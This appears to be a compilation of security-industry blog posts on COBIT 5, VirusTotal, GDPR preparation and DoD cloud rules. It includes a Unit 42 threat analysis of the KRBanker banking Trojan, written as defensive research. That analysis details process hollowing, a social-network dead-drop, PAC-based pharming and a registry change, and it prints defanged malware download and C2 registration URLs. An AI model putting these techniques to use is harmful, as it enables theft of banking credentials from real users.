Are Your IT and Strategic Business Goals Aligned?

Developing and using models to help represent relationships between business strategy and IT is an effective method to show the strategic effect of IT within the enterprise. As more and more business commerce becomes automated, the growing impact of IT on business strategy, such as the development of a sustained competitive advantage in a highly connected world, becomes increasingly evident.
Alignment of IT and business strategies is paramount for achieving and maintaining a leadership position. Today, the elements that differentiate one successful organization from another are difficult to observe and measure as the power of imitation levels the playing field, making a business-driven, information-centric and technology-supported strategy imperative.

How Does COBIT 5 Contribute to the Alignment of Goals?

COBIT 5 is an integrated framework that facilitates the achievement of the business’s strategic goals and solidifies value through an effective IT governance and management approach.
COBIT 5 provides for the governance and management of enterprise IT (GEIT) in a holistic way for the whole organization, taking into account the needs of business and functional area stakeholders and driving the business's strategic goals in an end-to-end fashion throughout the enterprise. Because COBIT 5 aims to help organizations achieve balance in financial, customer, internal process, and learning and growth goal sets, the framework may be applied to public, private or nonprofit organizations.
Upon adopting COBIT 5, the organization will be able to identify strengths and weaknesses associated with its IT processes and environment. This, in turn, will identify areas where processes can be optimized to better support the organization’s goals and provide for safer, more dependable operations. Similarly, the organization will be able to ensure that IT has the correct direction, i.e., alignment with strategic business goals.

Implementation Stages

A successful strategy for implementing COBIT 5 always begins with identifying the drivers for developing the organization’s goals and the primary results the organization would like to achieve, whether it be realizing the benefits of a strategy or optimizing risk or resources. Once this is understood, an implementation of COBIT 5 should consider the stages shown in figure 1.

Figure 1—COBIT 5 Implementation Stages

Source: A. Zapata. Reprinted with permission.

ISACA provides some related COBIT 5 materials that can be used to obtain additional references to this suggested strategy, including the COBIT 5 Framework, COBIT 5: Enabling Processes, COBIT 5 Process Assessment Model (PAM): Using COBIT 5 and COBIT Self-Assessment Guide: Using COBIT 5.

Conclusion

COBIT 5 provides a powerful framework for the identification of enterprise goals. It also enables each critical process to be directly aligned to achievement of these goals in a way that can be easily measured and communicated. By applying the proven and efficient implementation strategy suggested, any organization can understand how effectively it is achieving these goals and ensure transparency across all functional areas.

Alexander Zapata, CISA, CGEIT, CRISC, COBIT 5 Implementation and Assessor, ISO 22301 LI, ISO 27001 and Foundations, PMP

Is an international consultant in IT governance and IT improvement with experience in Mexico, Colombia, Panama and Peru. He is also an expert instructor and COBIT 5 Accredited Trainer. He can be reached at azapatacolombia@yahoo.com.

[ISACA COBIT Focus]

VirusTotal Policy Changes Have No Impact On Palo Alto Networks Customers

What’s happened?

On Wednesday, May 4, VirusTotal cut off unlimited ratings access to companies that do not share their own evaluations of submitted research samples.

How does this impact Palo Alto Networks customers?

There is no impact to Palo Alto Networks customers or the protections our customers receive from us. VirusTotal will continue to provide subscribers, including Palo Alto Networks, access to all file samples. There is no change to the way we work with VirusTotal. Palo Alto Networks collects file samples from as many sources as possible. VirusTotal is one of many sources we use, but we do not rely on VirusTotal or any other third-party service to provide file verdicts.

Palo Alto Networks relies on our WildFire cloud-based malware analysis environment to determine if a file is malware, greyware or benign based on static and dynamic analysis.

To learn more about WildFire, visit:  https://www.paloaltonetworks.com/products/secure-the-network/subscriptions/wildfire

[Palo Alto Networks Research Center]

KRBanker Targets South Korea Through Adware and Exploit Kits

Online banking services have been a prime target of cyber criminals for many years, and attacks continue to grow. Targeting online banking users and stealing their credentials has yielded huge profits for the criminals behind these campaigns. Unit 42 has been tracking “KRBanker”, also known as “Blackmoon”, since late last year. This campaign specifically targets banks of the Republic of Korea. On April 23, researchers at Fortinet published a blog describing the functionality of the recent “Blackmoon” campaign. Our objective in this blog is to share additional details on the distribution of the KRBanker (Blackmoon) malware campaign and indicators for KRBanker samples.

Early variants of this campaign started surfacing in late September 2015. Though the number of KRBanker infection attempts was relatively low in 2015, we have noticed a gradual increase in the number of sessions since the start of 2016, and identified close to 2,000 unique samples of KRBanker and 200+ pharming server addresses in the last 6 months.

Figure 1 KRBanker download sessions on Autofocus

Malware Distribution

Our analysis shows that KRBanker has been distributed through web exploit kits (EK) and a malicious Adware campaign. The exploit kit used for installing KRBanker is known as KaiXin and the Adware which distributes it is called NEWSPOT.

In March 2016, Unit 42’s Brad Duncan wrote two articles for SANS and Malware-Traffic-Analysis.Net, noting that the KaiXin EK had been observed in the Republic of Korea. In those cases, malicious JavaScript served through compromised web sites or advertisements led to the EK, which exploited Adobe Flash vulnerabilities CVE-2014-0569 or CVE-2015-3133. We confirmed that the final payload in both cases was KRBanker.

Another distribution channel is a malicious Adware program called NEWSPOT. According to the product’s marketing document, NEWSPOT guarantees 300% revenue growth for online shopping sites. NEWSPOT is a basic adware program that displays advertisements in browsers, but since at least November 2015 it has started installing malware. When visiting some Korean websites, a user may notice a pop-up of a browser add-on requesting installation of NEWSPOT.

Figure 2 Installing NEWSPOT tool

If installed, the adware is executed on the computer and starts getting configuration from the following URL:

http://www.newspot[.]kr/config.php?sUID=[web site name]

It then downloads a file from the URL given in the <update> section of the configuration data returned by the server.

Figure 3 Configuration file contains download link to malware

This channel might originally have been used to update the NEWSPOT software, but we have confirmed that banking Trojans such as KRBanker and Venik have been installed through this update channel. Figure 4 shows the URLs:

Figure 4 Downloading Banking Trojans from NEWSPOT update channel

Execution

KRBanker uses Process Hollowing to execute its main code in a clean (non-suspicious) executable. The process is as follows:

  1. KRBanker executes a clean PE file in System directory.
  2. Windows loads the PE file into memory.
  3. KRBanker overwrites the whole clean process with its own (malicious) main module.
  4. Overwritten process starts malicious activity.

Figure 5 Execution Steps

Figure 6 Execution Steps (cont.)

After a successful execution the Windows Firewall alerts the user on the process attempting to access the Internet. Many users may allow this activity because the process originally involved a clean Microsoft file.

Figure 7 Windows Firewall Alert

Pharming

Banking trojans like Dridex or Vawtrak mainly employ Man-in-the-Browser (MitB) techniques to steal credentials from targeted victims. KRBanker, however, uses a different technique known as “pharming.” This technique involves redirecting traffic to a forged website when a user attempts to access one of the banking sites being targeted by the cyber criminals. The fake server masquerades as the original site and urges visitors to submit their information and credentials.

Set Up

The IP address of the fraudulent server is not hard-coded in the malware. KRBanker obtains the server address from the Chinese social network Qzone through a Web API. The API returns basic user information when a QQ number is sent to the following URL:

users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=[QQ ID Number]

The server responds with the QQ ID number, a link to the profile picture, the nickname and some other information from the profile identified by that QQ ID number. The author of the Trojan placed the pharming server address in the “nickname” field, so the social network profile acts as a dead drop that can be updated without changing the malware.

Following is an example response containing the IP address 23.107.204[.]38, which KRBanker then extracts and uses for pharming.

Figure 8 Receiving IP address for Pharming from QZone

Next, KRBanker obtains the MAC address using an embedded VBScript and the system code page by calling the GetOEMCP() API on the compromised system. It then registers the compromised system with the C2 server by sending the following HTTP GET request:

http://[IP address]/ca.php?m=[encoded MAC Address]&h=[code page]

Proxy Auto-Config

Researchers at ALYac had previously reported on KRBanker employing hosts file modification and local DNS proxy techniques to redirect HTTP traffic. The latest version of the threat instead employs Proxy Auto-Config (PAC), a legitimate Windows feature that lets network administrators define the appropriate proxy for each URL in a small JavaScript function; Fortinet also mentioned this in their blog post. The adversaries abuse this feature for pharming.

To configure this, the Trojan starts a local proxy server and creates the following registry entry.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://127.0.0.1:[random]/[random]

The local proxy hosts encrypted JavaScript.

Figure 9 Malicious JavaScript for Proxy Auto-Config

After decrypting the JavaScript we can see the PAC entry point, FindProxyForURL(), which is used to check the requested host against a list of targeted sites.

Figure 10 Decrypted malicious JavaScript

When the browser attempts to connect to a web server, it first fetches the PAC script from the local proxy and calls its FindProxyForURL() function, which compares the requested domain with the list of targets. If the domain being accessed matches any of the targets on the list, the function returns the fraudulent server as the proxy and the traffic goes there. If not, the traffic goes directly to the legitimate domain being requested.

Figure 11 Redirecting traffic by Proxy Auto-Config

Currently, KRBanker is targeting a large list of Korean financial institutions using this pharming attack.

When a compromised user visits one of the targeted websites, the user will see a page like the one shown in Figure 12 below. It appears to look like a legitimate webpage with a valid URL displayed on the address bar of the browser. However, this is a fake website for stealing the credentials and account information of the victims.

Figure 12 Fake Authorized Certification Center for renewal

KRBanker is also capable of taking the following actions:

  • Stealing certificates from the NPKI directory in order to access online banking accounts
  • Terminating AhnLab’s V3 security software

Conclusion

Profit is the primary motivator for attackers who use banking Trojans. The adversary behind KRBanker has been developing new distribution channels, evolving the pharming techniques multiple times, and releasing new variants on a daily basis to maximize the revenue from victims.

As described in this article, the threat is distributed through Exploit Kits that exploit old vulnerabilities and Adware that needs to be manually installed. It is essential to understand the infection vectors of such campaigns to minimize the impact. Palo Alto Networks Autofocus users can track this threat using the ‘KRBanker’ Autofocus tag.

Indicators

The indicators on KRBanker can be found on Unit 42’s github page below

https://github.com/pan-unit42/iocs/blob/master/krbanker/hashes.txt

and

[Palo Alto Networks Research Center]

Don’t Put Off Till Tomorrow What You Should Start Today (Part 1)

For some, the upcoming EU legislative changes (the General Data Protection Regulation, referred to as GDPR, and the Network and Information Security Directive, referred to as the NIS Directive) may have seemed like they are a long time in coming, since early discussions started back in 2013. Yet as is often the case with such processes, it becomes all too easy to keep holding off from preparing, especially when details are still to be finalized. From current speculation, it seems that both will be documented in the Official Journal of the EU shortly, which – for those who haven’t already started preparing – should be the final call to action, and implementation will officially start.

The question for many now becomes: Are they at the right place on the journey? Human nature drives us to want to compare ourselves with our neighbors to ensure we are doing the right things, and where there are time deadlines, that we are on track to achieve them.

From a recent webinar run with the industry group ISACA, I took the chance to poll the attendees to gather more insight on organizations’ state of preparation in terms of their cyber security strategies.

With any legislative requirements, the first objective is to be clear on what needs to be done. In this instance both pieces of legislation use the term “State of the Art”, which aligns to the requirement to have security by design and default. Specifically with the GDPR, that requires regard for this to be relevant to the risk.

In the last 12 months, exactly what “State of the Art” means has seemed to be one of the most common questions, as many security practitioners and leaders are typically more confident with granular requirements. But in polling the 1400+ people who registered for the recent webinar, it was found that 64 percent of those who responded now claimed to know what “State of the Art” is. Unlike some other industry regulatory requirements, GDPR and the NIS Directive will likely remain in force for a while. As such, it would be virtually impossible to define detailed requirements; the term is more a placeholder requiring organizations to ensure they keep educated on cutting-edge cybersecurity capabilities and processes.

I have found myself having numerous discussions with other industry experts around how we would be sure that each of our interpretations of “State of the Art” would stand up to an auditor or another company. As such, my guidance would be that whilst we often look at the technical aspects of legislation, it’s important to engage with the business and legal teams in your company to ensure there is consensus on your interpretation of the requirement. Whether we like it or not, we should be prepared to qualify our adherence, be that to an auditor or to an authority, when responding to an incident.

Although it’s great to see that many are comfortable with the concept, there are others who are still getting their heads around the additional responsibility. I suspect more broadly that while the first goal will be to validate and achieve the relevant regard for “State of the Art”, very quickly cyber security leaders will also need to qualify just how long the current interpretation remains the case, as it’s not a one-off goal but an iterative requirement. As such, processes that continue to validate and subsequently apply “State of the Art” must become part of the normal cyber strategy.

The challenge for many is that while we look to prepare for these legislative changes, we still have a day job. Therefore the question becomes: Where does it sit in the priority stack? Here the poll showed that there was a split in views. Thirty-six percent had this in their top 10, and an additional 21 percent had it in their top three. Yet 20 percent were only planning to look at these legislative requirements in 2017, and a further 16 percent were planning to wait until the requirements come into effect in 2018. It would be interesting to see the industry breakdowns here, as I could speculate that those that are already more heavily regulated may be more proactive, as they are used to the process. But from my own experiences, I have also seen regional perceptions of legislation enforcement, especially where the historical variance in enforcement of data protection requirements could be a factor. The goal of harmonization, which was one of the key drivers of GDPR reform, aims to ensure we all abide by the same rules and enforcement guidelines.

My personal guidance here would be that if you haven’t already started to prepare, you should do so now. It takes time to validate the gap analysis (again for those that are already heavily regulated, this may be much smaller than those that are not today), but agreeing on a budget, validating solutions and deploying and testing capabilities all take time.

At an executive level, the natural first question when discussing the proposed new legislation is: What impact does that have on our business? Here the replies to the poll were very broad. Many were still unclear, while others focused on either the brand damage concerns that would likely come from public disclosure of an incident, or concerns around the new penalties for data breaches that have been defined in the GDPR. The very broad scope of responses, I would suggest, should be our biggest concern. If the impact to businesses cannot be clearly defined, how can they be expected to support their cybersecurity teams in investing time and resources to achieve compliance? As such, while it seems confidence is growing when it comes to some of the terminology, such as “State of the Art”, there is still a need to be clearer on the impact of these new regulations. For me this highlights why many are still holding off in terms of making it a priority for 2016.

[Palo Alto Networks Research Center]

DoD Updates Government Security Requirements for Cloud, But What Does That Really Mean?

IT officials from the Department of Defense (DoD) have released an update to the Cloud Computing Security Requirements Guide (CC SRG), which establishes security requirements and other criteria for commercial and non-Defense Department cloud providers to operate within DoD. These kinds of updates are not uncommon. In fact, they are encouraged through an interesting use of a DevOps type methodology – as the DoD explains:

DoD Cloud computing policy and the CC SRG is constantly evolving based on lessons learned with respect to the authorization of Cloud Service Offerings and their use by DoD Components. As such the CC SRG is following an “Agile Policy Development” strategy and will be updated quickly when necessary.

The DoD offers a continuous public review option and accepts comments on the current version of the CC SRG at all times, moving to update the document quickly and regularly to address the constantly changing concerns of an evolving technology like public and private cloud infrastructure. The most recent update includes administrative changes and corrections and some expanded guidance on previously instated requirements, with the main focus on the updates being to clarify standards set in version one and alleviate confusion and any potential inaccuracy.

If you are interested, you can read through the entire CC SRG revision history online.

What is particularly interesting here is the DoD’s acknowledgment that management of cloud environments is constantly evolving, security requirements and best practices need to be iterative, and updates need to be made regularly to ensure relevancy. It’s also important to note that the CC SRG is only one of many government policies put in place to help government agencies securely and effectively implement cloud infrastructures. There are also guidelines like NIST SP 800-37 Risk Management, NIST 800-53, FISMA and FedRAMP to consider. All of these provide a knowledge base for cloud computing security authorization processes and security requirements for government agencies.

What the DoD’s updates to the CC SRG should reinforce for agencies is that they need to have a clear cloud strategy in place in order to ensure compliance and success in the cloud. Determining the best implementation of these guidelines for your needs is difficult in and of itself. Add to that the ongoing management and updates required to keep up with ever-evolving guidelines and an IT team can find itself struggling.

By partnering with systems integrators and software vendors, or working directly with a managed service provider, like Datapipe, government agencies can more easily develop a long-term cloud strategy to architect, deploy, and manage high-security and high-performance cloud and hosted solutions, and stay on top of evolving government policies and guidelines.

For example, Microsoft Azure recently announced new accreditation for their Government Cloud, Amazon AWS has an isolated AWS region designed to host sensitive data and regulated workloads called AWS GovCloud, and you can learn more about our new Federal Community Cloud Platform (FCCP), which meets all FISMA controls and FedRAMP requirements, and all of our specific government cloud solutions on the Datapipe Government Solutions section of our site.

Brian Burns, Bid Response Manager/Government Affairs, Datapipe

[Cloud Security Alliance Blog]
